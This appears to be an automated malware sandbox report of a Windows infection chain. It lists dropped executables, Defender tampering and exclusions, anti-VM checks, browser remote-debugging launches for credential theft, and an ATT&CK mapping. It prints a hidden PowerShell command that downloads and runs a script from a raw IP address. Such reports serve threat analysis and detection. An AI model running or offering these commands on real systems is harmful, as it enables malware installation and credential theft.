C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2460 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37ded5e7-249f-4225-a06d-b43d3c6e32a6} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" socket8⤵PID:2200
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2748 -childID 1 -isForBrowser -prefsHandle 3336 -prefMapHandle 3332 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b799800d-a53d-4e03-8e01-3d4ccbe4ad86} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab8⤵PID:1784
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3928 -childID 2 -isForBrowser -prefsHandle 3940 -prefMapHandle 3936 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a48ff07e-8e66-48c4-848b-7362395d41a9} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab8⤵PID:2496
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4792 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4860 -prefMapHandle 4856 -prefsLen 32766 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {902c3cf2-b2a6-4cae-93a4-edc9461ec68f} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" utility8⤵
- Checks processor information in registry
PID:5652
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5108 -childID 3 -isForBrowser -prefsHandle 5100 -prefMapHandle 5096 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {556975f8-63b0-463c-a171-f422ffef4a00} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab8⤵PID:5912
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5344 -childID 4 -isForBrowser -prefsHandle 5348 -prefMapHandle 5352 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {57fab3bd-02d4-4f3f-b10f-aa1227969539} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab8⤵PID:5948
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5472 -childID 5 -isForBrowser -prefsHandle 5480 -prefMapHandle 5484 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3e37934-9c7f-44ee-8dd6-66fdc58491d7} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab8⤵PID:6072
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe"C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe"5⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5204
-
-
C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6036
-
-
C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5296
-
-
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5796 -
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:6024 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5716 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbc4e2cc40,0x7ffbc4e2cc4c,0x7ffbc4e2cc588⤵PID:4720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2288,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2280 /prefetch:28⤵PID:5692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1764,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2512 /prefetch:38⤵PID:5616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1964,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2556 /prefetch:88⤵PID:3716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:18⤵
- Uses browser remote debugging
PID:5444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:18⤵
- Uses browser remote debugging
PID:4000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4416,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4484 /prefetch:18⤵
- Uses browser remote debugging
PID:2600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:88⤵PID:5548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4820,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4828 /prefetch:88⤵PID:3832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5012,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4984 /prefetch:88⤵PID:6588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5256,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5196 /prefetch:88⤵PID:6940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,2433943998444606021,6033092103814035203,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:88⤵PID:4688
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2476 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbcc0346f8,0x7ffbcc034708,0x7ffbcc0347188⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:28⤵PID:440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 /prefetch:38⤵PID:6060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:88⤵PID:3968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:18⤵
- Uses browser remote debugging
PID:6732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2044,3000808488345216500,17110035482850691465,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:18⤵
- Uses browser remote debugging
PID:1768
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 7926⤵
- Program crash
PID:2460
-
-
-
C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\EX0eXUWS\Anubis.exe""6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
-
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1212 -
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"6⤵
- Executes dropped EXE
PID:220
-
-
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3340
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 8086⤵
- Program crash
PID:1664
-
-
-
C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4584
-
-
C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:3960 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2368.tmp\2369.tmp\236A.bat C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"6⤵PID:4856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:6544 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yx3jx0rn\yx3jx0rn.cmdline"9⤵PID:6768
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60BF.tmp" "c:\Users\Admin\AppData\Local\Temp\yx3jx0rn\CSCEDF5BF9B205D4E9AA655161C65EFDFFA.TMP"10⤵PID:6796
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe"5⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4288
-
-
C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe"C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4760
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3036
-
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe1⤵
- Executes dropped EXE
PID:3716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3988 -ip 39881⤵PID:1852
-
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe1⤵
- Executes dropped EXE
PID:936
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1496
-
C:\ProgramData\bcngpqs\ovql.exeC:\ProgramData\bcngpqs\ovql.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5796 -ip 57961⤵PID:2160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1212 -ip 12121⤵PID:3816
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4612
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6348
-
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe1⤵
- Executes dropped EXE
PID:6356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:6984
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
6Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5030b5b0c2a5d27af64d78103ee455b0f
SHA1157334363e98d2e260f39a7a0f53042346437d30
SHA256cb8dc5770b3c87bf9b80ffa8623f81082ecd31da41b866aa37a3c22423c818a7
SHA51238e6fc0d2eefd7381935853048a95fe553caf3b2b6e2e479f71da258238130c958b0b220daa91eaea8793b4f32c9509da518ba1e7a096c8e650d59e6d8ac8905
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
152B
MD5518e43baec82d2ef9e0905610e0b092a
SHA1e9e831ceeadd177f1a21af276310e9923be2ea5f
SHA25699e3ed7887178257a44fbea0c076a6f5d3bc2ea6d18d9131b62836c7b1514042
SHA51276bfbb1b0f1d388b2dd2fe05f81a19a526041d72c6f2c385b2c918f8ec5701d211d162be9aa27a06ef86ccf2d5f20943f43ea485e277b067905ebe66d6910f17
-
Filesize
152B
MD5ff6782e4189696b75f01df16b0949468
SHA1f19bee2c6f2b27a4667d870d6cb370c1843c3ca3
SHA256871c150d3d4f5b73198680345ee4b49e2f1f18744066ce3afcea8ba5104c820c
SHA5127a1fb48b5f23f3f5f4c93c263b31f7c2152e2ec40f6d4bc1d33d7020a62dfef06feb13736be5aba859f8d247400b2d79b701399153d3341c93378c5fb1999aab
-
Filesize
5KB
MD563096555757810094b1af8d4aaa2d288
SHA1a6d05e2311c5bfdab96a5726f472a78f135ed2e6
SHA2560895c4036dab4ac52f405a3b068aa5a8c9f7f74038a07ddfed929c55d674053c
SHA5121210a82cc615659ef71a4466b7d2fa4a927392520a94b1d7edb73737ede9981b0a7c711273979338c5e154ad8176f3fdc42b84b3244d49623617568db1254a69
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\cffd7c4d-a076-4006-a75a-6c4a1303051d.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773
-
Filesize
17KB
MD53223d9d9283ab6dea8b043240c0abcec
SHA1429c69d22519219d509e9edc7b0c0ae3a4db0680
SHA256234e24e0e2393ef19df8b54fae996d457364c327f3ca44b5353a85a803e1d037
SHA512f3816f23013386c5f7809adceeb7b8f6cbffaa688a5f3c1dd3645ec3a76d2fdeda522da0ee463008880bc862d96c7cf00152be4360de058c53e941edad149397
-
Filesize
17KB
MD54b7a9eb731340efa705ae735724cda3b
SHA165586e6e5fb5c16799c0151832665de5206f39e7
SHA256ba518835c112ae79de6180ee3aa05369b666ea21dac12f337aeb68e350b422c2
SHA512432f2d632ba93a1b2ebfc8dd5ca3c1e6f99a837629efe0cd675a606b87962e52c6a09e60b60e52155b8bccfcb3cdfbda09da8c9defa8c0990cab2e14d97aa27c
-
Filesize
17KB
MD59931c49ac0ae2007c7a91de364d72928
SHA1c0cb9757b6e30490852d922afba5147933c6f9f5
SHA2565cf7e221e6c3a138ef0fcf64871b32b7dcd03ffd29255caf5c7adae733820744
SHA512c7152caf2fe8220141b4a80eb2bfb0fe6d77ee8a0fc7b3208a67acf3c7c943e9cfc4441f489f2c2ef84e1c420243bfbca1aa4e56f623a8a483bddf7b5ea1b918
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\activity-stream.discovery_stream.json
Filesize21KB
MD51d81ada496d4badbcc357ae68d035448
SHA137bf33f7ad525893a93ee1608e56f618dec56ee2
SHA2569aa2f7c8425fcf2ba2bc1985fdd3a3e271c2abf448bb3ec4280341d1f964dbf7
